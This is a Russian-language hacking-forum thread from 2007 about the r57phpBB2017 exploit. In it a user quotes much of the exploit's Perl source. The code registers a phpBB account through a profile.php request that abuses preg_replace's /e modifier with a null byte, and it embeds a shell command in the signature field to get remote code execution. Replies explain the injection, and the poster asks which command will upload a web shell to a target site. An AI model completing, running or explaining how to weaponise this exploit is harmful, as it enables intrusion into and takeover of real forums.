HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

r57phpBB2017
  #1  
Старый 20.11.2007, 18:57
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
С нами: 10178781

Репутация: 44
По умолчанию r57phpBB2017

Всем привет! Возник вопрос касаемо сплойта
r57phpBB2017

В обзоре написано
Цитата:
Запускать "perl exp.pl <URL> <cmd>"
Где <URL> - ссылка до форума например http://site.com/phpBB/, <cmd> - нужная команда (о командах читаем тут http://forum.antichat.ru/threadnav7345-1-10.html).
Но к сожалению, по ссылке

Цитата:
Не указан Тема. Если вы пришли по правильной ссылке, пожалуйста сообщите администрации о нерабочей ссылке.

Кто подскажет что там за команды? Заранее спс.


И подскажите что это за строка в сплойте


Цитата:
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

for($i=0;$i<5;$i++)
{
$rand .= int(rand(9));
}

$name = 'r57phpBB2017xpl'.$rand;
$password = 'r57phpBB2017xpl'.$rand;
$path = $ARGV[0];
$cmd = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );

$res = $xpl->post(
$path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',

Content => [
'username' => $name,
'email' => $rand.'_bill_gates@microsoft.com',
'new_password' => $password,
'password_confirm' => $password,
'signature' => 'r57:`'.$cmd.'`',
'viewemail' => '0',
'hideonline' => '1',
'notifyreply' => '0',
'notifypm' => '0',
'popup_pm' => '0',
'attachsig' => '0',
'allowbbcode' => '1',
'allowhtml' => '1',
'allowsmilies' => '0',
'mode' => 'register',
'agreed' => 'true',
'coppa' => '0',
'submit' => 'Submit',
Что задает эта строка при реге???

Прошу ногами не пинать) Плохо соображаю, но пытаюсь разобраться.

Последний раз редактировалось am@tory; 20.11.2007 в 19:17..
 
Ответить с цитированием

  #2  
Старый 20.11.2007, 19:41
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами: 10077446

Репутация: 1020


По умолчанию

Команды: Жмяк
Сплойты:Жмяк
 
Ответить с цитированием

  #3  
Старый 20.11.2007, 21:05
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
С нами: 10178781

Репутация: 44
По умолчанию

Хмм, про запуск сплойтов я знаю и кажется я не задавал такого вопроса Оо.

Но все равно спасибо.

о кажется допер.
т е команды запускаются через РСТ шелл???

Последний раз редактировалось am@tory; 20.11.2007 в 21:11..
 
Ответить с цитированием

  #4  
Старый 20.11.2007, 22:13
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами: 10960226

Репутация: 1424


По умолчанию

это строка как раз самое ключевое в сплоите тоесть это код для preg_replace через который потом php inj идет, во )
 
Ответить с цитированием

  #5  
Старый 21.11.2007, 23:32
am@tory
Познающий
Регистрация: 08.01.2007
Сообщений: 59
С нами: 10178781

Репутация: 44
По умолчанию

Люди добрые, с командами я не дружу, как оказалось, подскажите можно ли этим сплойтом залить шел и если да, то какой командой?
Буду очень благодарен, оч надо.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.